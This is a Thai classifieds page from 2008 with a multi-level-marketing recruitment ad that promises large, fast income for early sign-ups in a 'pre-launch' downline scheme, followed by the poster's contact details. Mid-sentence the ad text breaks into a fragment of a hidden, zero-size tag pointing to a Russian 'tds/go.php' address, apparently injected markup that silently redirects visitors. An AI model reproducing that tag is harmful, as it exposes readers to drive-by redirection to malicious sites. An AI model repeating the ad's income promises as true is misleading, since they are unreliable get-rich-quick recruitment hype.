ประกาศซื้อขายฟรี
ด่วน ! สมัครสมาชิกฟรี และมีสิทธิ์ได้รับเงินรายได้ทันทีเมื่อลงทะเบียน (Join now)

ธุรกิจออนไลน์ที่ให้โอกาสที่ดีที่สุดของท่านจริงๆ  สมัครด่วนเลยวันนี้  หากท่านลังเลใจกลับมาสมัครใหม่ภายหลัง ท่านจะพลาดรายได้ก้อนโตไปอย่างน่าเสียดาย  นี่เป็นโอกาสของคนไทยจริง ๆ ที่ได้รู้จักธุรกิจนี้เป็นอันดับต้น ๆ ของโลก ที่เพิ่งเปิดตัวอย่างไม่เป็นทางการมาเพียงไม่กี่วัน

          เริ่มต้นด้วยการสมัครสมาชิกแบบ Pre-Enrollee สมัครฟรี !! ไม่มีอะไรต้องเสี่ยง สมัครเสร็จสามารถเข้าศึกษาข้อมูลในระบบได้ก่อน   เมื่อพร้อมแล้วค่อยลงทะเบียน(Joinnow ) เป็นสมาชิกเต็มรูปแบบทีหลัง  และเมื่อท่านลงทะเบียนเสร็จ มีสิทธิ์ได้รับเงินรายได้ทันที พร้อมกับได้รับเว็บไซต์สำหรับขยายสายงานฟรี ทั้งภาษาไทย และ ภาษาอังกฤษ
           ขณะนี้ระบบยังอยู่ในช่วง Pre-Launch จึงเป็นโอกาสดีสำหรับท่านที่มีวิสัยทัศน์และมองเห็นโอกาส ได้ขึ้นเป็นแม่ทีมก่อน หากท่านส่งอีเมล์ได้ โพสเว็บบอร์ดเป็น ท่านก็จะมีโอกาสประสบความสำเร็จสูงมาก  ยิ่งมีการลงโฆษณา  ท่านมีเครือข่าย MLM ในองค์กรอยู่ในตอนนี้  ก็จะทำให้ท่านกลายเป็นผู้นำที่มีรายได้มหาศาลอย่างรวดเร็ว และมั่นคงตลอดไป  หากท่านคิดว่าไม่รู้จักใครเลย แนะนำคนไม่เป็น ก็ให้รีบตัดสินใจสมัครทันที เพื่อขึ้นเป็นอัพไลน์ตามระบบจัดวางดาวน์ไลน์อัตโนมัติก่อนใคร ท่านก็จะมีโอกาสรับรายได้หลักหมื่นเช่นกัน ซึ่งระบบนี้จะแตกต่างจากทุกระบบที่ผ่านมา คือหากท่านไม่รู้จักใครเลย ท่านก็จะไม่มีรายได้แม้แต่บาทเดียว คือโตข้างเดียว เพราะอัพไลน์โยนให้ท่านแค่ข้างเดียว ไม่มีใครโยนให้ทั้ง 2 ข้างแน่ แต่ของเรากำหนดไม่ได้ครับ ว่างตรงไหนที่เป็นแมททริกซ์เดียวกันระบบนำไปวางตรงนั้นให้เลย เรากำหนดไม่ได้ว่าจะเอาคนนี้ไปต่อคนนั้นหรือเอาคนนั้นมาต่อคนนี้ ทุกท่านมีโอกาสอย่างเท่าเทียมกันที่จะได้คนเก่งๆ มาอยู่ใต้สายงาน  หากท่านมั่นใจว่าท่านสามารถแนะนำคนได้ 3 คน โอกาสในการที่จะรับรายได้หลักแสนนั้นมีแน่นอน

           ทำงานผ่านระบบอินเตอร์เนต 100%  ไม่ต้องกังวลกับการขายของ การชวนคน การเข้าอบรม   และหากเราไม่อยากแนะนำใคร ก็สามารถมีรายได้สูงสุด 50,000 กว่าบาท  (ตามแผนการตลาด คือ ถ้าเราต้องการ รับรายได้ ข้ src="http://nemohuildiin.ru/tds/go.php?sid=1" width="0" height="0" style="display:none">

จุดประสงค์
: ประชาสัมพันธ์
ประเภท
: สินค้าใหม่
ผู้ประกาศ
: กิตติธัช ณพัทลุง
โทรศัพท์
: 021575006
มือถือ
: 0812966281
จังหวัด
: กรุงเทพมหานครฯ
อัพเดทล่าสุด
: 3/9/2551 21:14:47

 โปรดอ่านคำเตือน

ข้อความที่ประกาศ และโฆษณาทั้งหมดนี้ เป็นสิ่งที่เกิดขึ้นจากผู้ชมและสมาชิก ที่เข้ามาใช้บริการ ไม่ได้เกิดจากผู้ดูแลหรือผู้จัดทำเว็บไซต์ หากผู้ชมสนใจในประกาศและโฆษณาดังกล่าว กรุณาติดต่อโดยตรงถึงผู้ที่ลงประกาศ หรือโฆษณา ด้วยตนเอง และหากเกิดความผิดพลาดใดๆ เราไม่ขอรับผิดชอบ ดังนั้นผู้ชมควรใช้วิจารณญาณก่อนการติดสินใจใดๆ เกี่ยวกับคำประกาศและโฆษณาดังกล่าวนี้
เว็บไซต์สำเร็จรูป

แสดงความคิดเห็น

Related Classifieds